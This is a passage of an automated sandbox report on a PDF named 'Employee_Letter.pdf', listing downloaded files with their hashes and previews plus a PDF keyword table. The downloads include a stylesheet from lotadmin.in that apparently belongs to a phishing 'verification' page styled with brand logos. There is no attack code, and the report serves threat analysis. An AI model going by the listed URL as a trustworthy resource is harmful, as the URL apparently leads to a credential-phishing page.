                                                                        SHA-512:FE694FE8D73E0C6A853D5D3D3F80E6C05FC8764E7808746DF694475D8A87A8A444A299D617FFD40773CC9505B14FB3A08A1C962E742415C286F3E3665C341598
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-desktop-heroslim-hero-bg?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1600&hei=632&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............J.....................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......@...x....pixi............av1C........colrnclx...........pixi..........av1C.......8auxC....urn:mpeg:mpegB:cicp:systems:auxiliary:alpha.....ipma.........................fmdat.....jq...2.....$P...=....\.Va..g.....!.|a.!....4..B....%..%....i...Z=.p7..Q.5..\..q....r..:H.!.,.].<.`!g>&H..A.|..?..P.vegk#.Kd.;V...Yo.g.....jq.......2...D....S7D.....9......;.a.S.2-y.g..../?7F....M....}....U.(C..PF.(.w."=#"yrTL.6.G.Qt.m.2..uN.}.d~..}Y^...f.9.[.u:._...AVM....q.d .(&.d.nW...|...&B..%w....L..M.....=l..~.w.RR.HI..;Zp.S......A.8.rG.....]...H.....t..I...dJ!p..S.C.&EY4..eBy.Bq"............>t.....AP.np$.%.2.9.f.>..#6..E......~..$0..#..pQVQ...rM.....Q@.GZ......,.....%..8.I(..th...kv.}........u...+]A@......0..6.A^.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):4302
                                                                        Entropy (8bit):4.8051819626117185
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C4772690CE4666275F53126A0D25EF06
                                                                        SHA1:70E2F36525485B19394E858D5AAC2E547F017DD5
                                                                        SHA-256:7165EA4E168AA399516671A63178504323591C1DCFBE48B6CA5B6E7386711683
                                                                        SHA-512:299EADA4C1E771A988685351A0C84F665445BDA67873A6CBF372278E1CA596BB91832375A0A5FE288DB2CD7E62516AF63884E5B03B66E9CA0FD297CFCC65D98A
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://lotadmin.in/due/cigam/style.css
                                                                        Preview:* {. margin: 0;. padding: 0;. box-sizing: border-box;.}..body {. font-family: 'Segoe UI', Arial, sans-serif;. background-color: #f5f5f5;. line-height: 1.6;. min-height: 100vh;.}...verification-container {. min-height: 100vh;. display: flex;. align-items: center;. justify-content: center;. padding: 1rem;.}...verification-card {. background: white;. border-radius: 8px;. box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);. width: 100%;. max-width: 400px;. overflow: hidden;.}../* Enhanced Logo Styles */..logo-container {. text-align: center;. padding: 1.5rem;. border-bottom: 1px solid #eee;. height: 120px;. display: flex;. align-items: center;. justify-content: center;.}...logo {. height: 40px;. width: auto;. max-width: 160px;. object-fit: contain;. transition: opacity 0.3s ease;.}...logo[src*="logo.clearbit.com"] {. height: 100px;. max-width: 300px;. min-height: 80px;.}...logo[src*="google.com/s2/fav
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):64198
                                                                        Entropy (8bit):7.996012884903902
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:0516BAC6202E18F1A5AB77E32ED6A3AA
                                                                        SHA1:DC3EAF1AA8E1F1E59C404BA82B858B328D0FA958
                                                                        SHA-256:A7AF6A161B9D9D3612B644E764E00045CCA1945456E60B31D5E09E5B05B5B568
                                                                        SHA-512:0DDE9FC5BC2663692C2DD6DFED9940E3358751B5D5057BAEAD93CC7CD2C06E6C71892A163F881455C074A7AF3AE08F96920E0DF206AD3952239EAEBAA5E05C7E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Desktop-solutions-tab2-img1@2x?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=1312&hei=984&qlt=100&fit=crop"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe....... ........pixi............av1C........colrnclx...........ipma...................mdat.....*h.......2...D.......N....-O..xu..P.c1+...h.G...+.ipvW.-.S0..x.>..H..X...NmX.4.....tR.~....5..5Y.v....]..0...W\........6.>y..SH}=.6..K*+.M.!.....".wU&...n...T.._*c8.5HJ;..m.{...S..H.Z.?.....BO.d.O.MM.....1.....Eb.;...sC.......qI&9..^.7..a=cI.....D0Q....+..P.*..|.=..9...`...h.|`.2+Bh...n.M...Z.I..8........x.B.8@..q.V..G.w..i.;..S..4...e.yHL.._.6.8._...21.-h.P0z..dZ..L.K.9..H.kd.&....i.x.1....#k....u..FF.d.U...-^.....&:2...S|...;8...(...O..p0.&.../{j\..p.C....Z..c.......jD../.......`A...O.VT.K..A.K...(Y......J...j..hy..5Y.....|).}...pk..y.B...."....^..d.1-....<.Ky.....W.7rZ..$..{$.!C.......(....;...j..Q%./0T.a\..O.....6.E.H...O.i:2+.~....WOe .8.......k.&.$.H{.4K...j....V..,w
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (678)
                                                                        Category:downloaded
                                                                        Size (bytes):5243
                                                                        Entropy (8bit):5.395959363705534
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:3DB5CF9FD3FAB92B3889302C8DE78D1B
                                                                        SHA1:1C493C13BC775036B36ACBA37941375ED0CE2ADA
                                                                        SHA-256:D29DB6171FCF5458896561430C466007D6E9709F83DF0CB950E273B93DDA7853
                                                                        SHA-512:1B13D7AA880D8987B5120FB6BB21CE53F6FB7769061E35C2BB87B59F32F176D52FC7F208461A7603EDCE26318E022B75F2CB27791C5D7A7D826B2C141D33AA70
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-cookievalidator.min.ACSHASH3db5cf9fd3fab92b3889302c8de78d1b.js
                                                                        Preview:'use strict';(function(){function q(){return new Promise(function(e){window.oa=window.oa||{load:!0};(function(h,k){function m(b){b+="\x3d";for(var f=decodeURIComponent(h.cookie).split(";"),g=0;g<f.length;g++){for(var a=f[g];" "===a.charAt(0);)a=a.substring(1);if(0===a.indexOf(b))return a.substring(b.length,a.length)}return""}function p(b,f){if("function"===typeof b[3])b[3](b);var g=f.createElement("script");g.type="text/javascript";g.src=b[1];g.async=b[2];g.addEventListener("load",function(){b[4](b);.e()});g.addEventListener("readystatechange",function(){"complete"===this.readyState&&b[4](b)});if(b[8])b[8]();f.getElementsByTagName("head")[0].appendChild(g)}window.oa.container||(window.oa.container=!0,!function(b,f,g,a){for(var d=f.getElementsByTagName("script"),c=0;c<b.length;c++){var l=a(g.location.search.toLowerCase(),f.cookie),n=b[c];if(-1===Array.prototype.indexOf.call(d,f.location.protocol+n[1])&&n[6]&&n[0].test(f.location.href)){if(l!==n[5]&&null!==n[5]||m("bp_"+n[7].split(" ").j
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 1720 x 80, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):13016
                                                                        Entropy (8bit):7.883155506636877
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F5B4B4F04F1924F9470DC3C0B3E4FC01
                                                                        SHA1:28D187B90F70638832771600CD556BC85B418A37
                                                                        SHA-256:98FB37F9F0DA54BB17E1322E1A49D5D683854A0BD3DE47C01EB3F0CCBB8B2999
                                                                        SHA-512:676E6866C149E56699CA65887D4DB5903CD6F84D32987215F218082E4E441340931221BDED2A78512DEDF417848379DD7E45BF4F87804BC7FEFF7CB3632CB53B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://lpcdn.lpsnmedia.net/le_unified_window/10.13.0.5-release_5314/resources/icons/desktop/sprites_v1.png?v=10.13.0.5-release_5314%22%20alt=%22End%20conversation
                                                                        Preview:.PNG........IHDR.......P.....B.uk....pHYs...........~... .IDATx.....\.u..+{)....b...G9d....hL#....."p-[K.J.6G.;..i4..q.8.0q.vk...QVk#...3.lq...a+....J.....b..vQ....b..)...s..7....w.}.... w~.}3.....k.^.h.....X.z}.a.9<...............-o......c.-..s.Ti.......^x...g_.i...=........\R?0S....sg.....G....o.J.m...].b....u...w.Z...[...}.l...1.~..B...7.\HT?0S...n....y"......z}.^`.4.T....Y......?7w.;..A...X...s..Um..~`..V..G.J,$.5...Mg..#.|...S...O.?..u..7]{....nxK.....?2.<.....N..i...?....=.......q....>..c[..f...#.jG..F.!6.......G.}O.~.*.$..w..+..,....M.>.}....6T$1g?.Z......1.l_5....6.-......-.W.$..B"9!V.q.JCd....G.I.C8...... 4....K....mH....d.&..IT..<.~...,Hp.%.v.@.~.7k......Z.Y......p.^#.....l.35..5I`j'%..1..x.........={.*o....bye..;v..1./~.w[..{@.N...J.mG..z...[w.=x....K....C..\......;....{o....Y..?...K;c..~...u.)m.M...m-.g.}O.MU.7.~._.eK~..UI 6Ht..l6.........F2v....q.zV..TZ..w}v.....h.t...T%..>5.7.$.{A...lsY..2.K..f.b.>....)...K...RL
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):56755
                                                                        Entropy (8bit):4.772033509869393
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:4AB0EEDAB0BA9025FAA176C16F80B8B4
                                                                        SHA1:1F099577B7BD33E3FA02B9D13E19F7A1126E36B8
                                                                        SHA-256:3595DE3D23938FCC8107D8811EE9806BA642C235BF0EB9073B99AE3A0C5D62DE
                                                                        SHA-512:F293BF08DA53E3A01C0CE65CEFD4F3D680B9AE7375EEC13D92FB1FEFEE7CEA975C0916C895D31CBAEF535BF5914BBAF14EC5639D3EB6B670A8798094A9E39BD9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-product-pricing.min.ACSHASH4ab0eedab0ba9025faa176c16f80b8b4.js
                                                                        Preview:(function () {. /** Check if OneCloud Reimagine namespace exists */. if (!window.ocReimagine) {. window.ocReimagine = {};. }.. /** Create product price module namespace */. if (!window.ocReimagine.ProductPriceModule) {. window.ocReimagine.ProductPriceModule = {};. }.. /** Initializes the reimagine product pricing manager and services */. function initializeProductPriceModule() {. try {. // Check if product pricing manager instance exists. if (window.ocReimagine && window.ocReimagine.ProductPriceModule && window.ocReimagine.ProductPriceModule.PricingManagerInstance) {. // If it exists, that means it has already been initialized so no need to re-initialize. return;. }.. window.ocReimagine.ProductPriceModule.PricingManagerInstance = new window.ocReimagine.ProductPriceModule.ProductPricingManager();. }. catch (error) {. }. }.. /**. * By defau
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (6982), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):6982
                                                                        Entropy (8bit):4.890639313885154
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F1EB7E4EA36185A91C404F6105FC4A27
                                                                        SHA1:95A8C61028B5777D56F693C64902A98F200FE394
                                                                        SHA-256:5930BE8B563A637E5C98C385974998B1246380DEF9948E538EAA6B630ECF99D2
                                                                        SHA-512:32BB88B386C97D03098CB25E8CF36EE13F884EDF86FA72F7F1893F67DD41337C8DCB99F692BD3EEF6A6CF9751C6CA2F88F6DDAE36C9CF35E9D1F0A0A63E2625F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://accdn.lpsnmedia.net/api/account/60270350/configuration/setting/accountproperties/?cb=accountSettingsCB
                                                                        Preview:accountSettingsCB([{"id":"messaging.ios.sdk.min.version","createdDate":"2017-01-10 04:11:41","modifiedDate":"2023-01-22 16:38:10","type":2,"propertyValue":{"value":"1.1.36"},"deleted":false},{"id":"nbc.integrations.adobe.analytics","createdDate":"2021-07-07 07:29:31","type":2,"propertyValue":{"value":"false"},"deleted":false},{"id":"messaging.audio.sharing.enabled","createdDate":"2018-05-13 02:02:09","modifiedDate":"2018-11-14 08:32:03","type":2,"propertyValue":{"value":"false"},"deleted":false},{"id":"messaging.ios.logs.settings","createdDate":"2017-01-10 04:11:41","modifiedDate":"2023-01-22 16:38:10","type":4,"propertyValue":{"value":{"level":"WARNING","minLogLevel":"INFO","randomFactor":1000.0,"maxEvents":50.0,"maxPendingEventsRequests":10.0}},"deleted":false},{"id":"le.site.otk.forceDurationOverride","createdDate":"2021-06-29 03:18:17","type":2,"propertyValue":{"value":"false"},"deleted":false},{"id":"messaging.file.sharing.blurAllConversationImages","createdDate":"2021-04-13 05:58
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 126828, version 768.256
                                                                        Category:downloaded
                                                                        Size (bytes):126828
                                                                        Entropy (8bit):7.995551491026822
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:297973A488F688271DD223D542BA2697
                                                                        SHA1:ED99D812E4C88826335F93ACEDE3FAD85C90FB54
                                                                        SHA-256:1B099F88C06ED0869872561C157F0EC9CBE133A0939D9ECE4EE1E1F54BD4683D
                                                                        SHA-512:83C802972D9FEE9DD7E3C0DE42D8636C504E65FF20E43406BB446CC95A16ACAA21789A03F0E2006148ABFE47100BBD0C66AA4CF98F11E9B0220F1DCDB5204F46
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0/webfonts/fa-solid-900.woff2
                                                                        Preview:wOF2.......l......fP...!.........................8.$. .`..$...h..0.(..p. .'3...@X....v{."*.=<D....@UUUU3..;T5.....~._..7........?.....?....|....o...?~..{_|0.....f....j.$5.....Di,...\.H...&)0......o......LA...{.;./.T<.5w.6.Z...n..@.e.'..7.......... ..jD.......D..H..=a.....xx....2.....@2;..H }..\...O.....C..}I;5S.......s.....z.....;.h...R.........p...e.<Y9..Uuo...r.\.U.z:Mw......Q..R....B..Q6.A...ZB|6.....8.S\..m?'F.8.3..........,.}u.tW...........va.'..........I............Av.,.....F#..<w.W..R..s....P.WwW.PwO.H...,Y..e.=.8F..;....%%...{B..Y...L....F...^...y.om.......|v.3.......IQQGE..uvEEE...m......uV....].Q...EI./LJ,**2...FE....f..........Z+_O..~.f..e..R';K=5..B.<...qQa!.....};.......x.Q.~....1......B..!+.3.XU.jz.!....&.W...#.....J#.H..k......-.kN.,...Y.6z,."E..f....9...........Ddb...AD&.....d...(2.J.#..R.....@....mD&..L.kU$.A.(. .V._...v_]....(~V-.Tu.*G}S...U.....z.s.&...ci%.........cZ...u.C........y...C..5qS.X`..4.....]E,..L|.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (584)
                                                                        Category:downloaded
                                                                        Size (bytes):6798
                                                                        Entropy (8bit):5.383941368080596
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1DABD5CC3F7B68C178B59EA74DC62947
                                                                        SHA1:B8DF9D8FD267B8B74325667DC97278CCC90A1464
                                                                        SHA-256:E49EFB0A75AF4995902362EA679A0FC4EB120A881A090CB8424D5CBD183436A2
                                                                        SHA-512:8C26E45CA37AC5DCCCC0C7BBCA92E0E8E11FB807A6D9A6916D5A0CC1CF198A7942DD5583C31ACBD1A11DDE004C252806D205E9CFDA7F494A6F7D5BBFA42920E4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASH1dabd5cc3f7b68c178b59ea74dc62947.js
                                                                        Preview:'use strict';(()=>{function m(f){var e=G[f];if(void 0!==e)return e.exports;e=G[f]={exports:{}};return I[f](e,e.exports,m),e.exports}var I={1623:()=>{$(function(){function f(){-1!==document.cookie.indexOf("".concat("Cascade.AuthSSO","\x3d"))&&(document.cookie="".concat("Cascade.AuthSSO","\x3d; expires\x3dThu, 01 Jan 1970 00:00:00 UTC;"))}function e(){var a=function(){var d=document.cookie.match(/(^|;\s*)(Cascade.AuthSSO)=([^;]*)/);return d?(d=parseInt(decodeURIComponent(d[3])),!isNaN(d)&&d>n.DefaultAttempted?.n.SharedStateAttempted:n.DefaultAttempted):n.NotAttempted}(),c=!(!window.msauthRpsShare||b.accountConstraint===w.AAD);if(a===n.NotAttempted||c&&a!==n.SharedStateAttempted)!function(d){$("#".concat("cascadeauthsso")).remove();var g=document.createElement("iframe");g.src=d;g.setAttribute("width","0");g.setAttribute("height","0");g.setAttribute("border","0");g.setAttribute("frameborder","0");g.setAttribute("style","display: none");g.id="cascadeauthsso";document.body.appendChild(g)}(""
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                        Category:dropped
                                                                        Size (bytes):61
                                                                        Entropy (8bit):3.990210155325004
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):149108
                                                                        Entropy (8bit):7.997924656773789
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:05B6A2C06640CBCE39CC5E7C992D872F
                                                                        SHA1:B3081205D1701EFD26D82899D1BED435AFB7D801
                                                                        SHA-256:BBB50D8DAA841D25A4411DF02E7299FF646A36013B8A48E194E362CD8CD3AA78
                                                                        SHA-512:7C4B3277CD6D8130975E2A51D3E735EDE037117FFD2737C8443F2E2775183F74EFA2C0B179476D62B1179F2D8F0A3BD96DBB4D266481A4A1187441546097BBD2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-mobile-vertical-accordion-solutions-featured-tab-5-328x270?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=656&hei=540&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............EZ...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma.................Ebmdat.....&h.o.....2..D....'"....Ks....8..m.,.%.i.....t.8.o.....p.b.._j..Bm..H..u...K.V.P...O1..Ad1jvX....Y.^..HJ..];1..Z...L.b..w...D...._..2vL.P.h..4...P.x..>.1.o.l..V....!....S..W.5.|+.}1....i.8n9.O.........P...gd..=uB...p.._...%...y..R.i+.b?...._..s.`....)...... .....C..|.TR.....j..6....3...r}.,..]..*.;o.._........W.[.......H...k..2...WI..D.:F.u.~..g+.bT.r*/..'.......:.(..)...L...6.....l.......(.*3.lf.}.f%..A...(n)..9.-[u%.i.......@'.Aq.V.j[.f.N..#L.w.!.qD....'.U.F.h.2.v..g.PD..g...#>..>.Y{Y.V...q..C}B.c.Gf......u...%.:.V..TG.zm..Z...(P.a.zF.v....".6._.....UWB4k..7$h....\.o..........=Y.b...h.-0.....nnJ\7E.,.Z....K..B..b..~_..$.+..i).~..T].>J._g:.....W.".WQ.0../5.........D.m..
                                                                        File type:PDF document, version 1.4, 1 pages
                                                                        Entropy (8bit):7.823610405254377
                                                                        TrID:
                                                                        • Adobe Portable Document Format (5005/1) 100.00%
                                                                        File name:Employee_Letter.pdf
                                                                        File size:44'070 bytes
                                                                        MD5:44a0a52720ef3d6c7aae78758c98b9d7
                                                                        SHA1:1955681f6572315679c5a8978e70d2c0c6418afb
                                                                        SHA256:cc4ca2625ffa997aa21dfe6e0434409bed703a05f02abb7762e70fbcd80c9a17
                                                                        SHA512:981d900b644cce5aa3fa8f6236ffa7bd60ccacf5a65d5fe9e8cc1fbe09ca2fa925cee2541a75f493c948d8b2675774ebfe545d4c59c2d7ad68eb6ba04e35bfa9
                                                                        SSDEEP:768:U2oxdF2wH4U4UmiaYdNm5tpjt4WavvnLU1qxij5lT7f5zoOxvzeD:U2oxSwYjtiXS5Xjt4WgvnLU1qkj5lPRC
                                                                        TLSH:5E13BF86E6103E02EECA9B92B305B26E6C1DF45BC5E039CEF33549657DDDA41E221D0B
                                                                        File Content Preview:%PDF-1.4.1 0 obj.<<./Title (...H.a.p.p.y. .B.i.r.t.h.d.a.y. .L.e.t.t.e.r)./Creator (...w.k.h.t.m.l.t.o.p.d.f. .0...1.2...6)./Producer (...Q.t. .4...8...7)./CreationDate (D:20241206120333-08'00').>>.endobj.3 0 obj.<<./Type /ExtGState./SA true./SM 0.02./ca
                                                                        Icon Hash:62cc8caeb29e8ae0

                                                                        General

                                                                        Header:%PDF-1.4
                                                                        Total Entropy:7.823610
                                                                        Total Bytes:44070
                                                                        Stream Entropy:7.865523
                                                                        Stream Bytes:40326
                                                                        Entropy outside Streams:5.159432
                                                                        Bytes outside Streams:3744
                                                                        Number of EOF found:1
                                                                        Bytes after EOF:
                                                                        NameCount
                                                                        obj26
                                                                        endobj26
                                                                        stream7
                                                                        endstream7
                                                                        xref1
                                                                        trailer1
                                                                        startxref1
                                                                        /Page1
                                                                        /Encrypt0
                                                                        /ObjStm0
                                                                        /URI0
                                                                        /JS0
                                                                        /JavaScript0
                                                                        /AA0
                                                                        /OpenAction0
                                                                        /AcroForm0
                                                                        /JBIG2Decode0
                                                                        /RichMedia0
                                                                        /Launch0
                                                                        /EmbeddedFile0

                                                                        Image Streams

                                                                        IDDHASHMD5Preview
                                                                        60010005153004100454b94435a972ee11624846834593511
                                                                        106d6b5b672529495bf67a669787f8c024313f5ac336deb958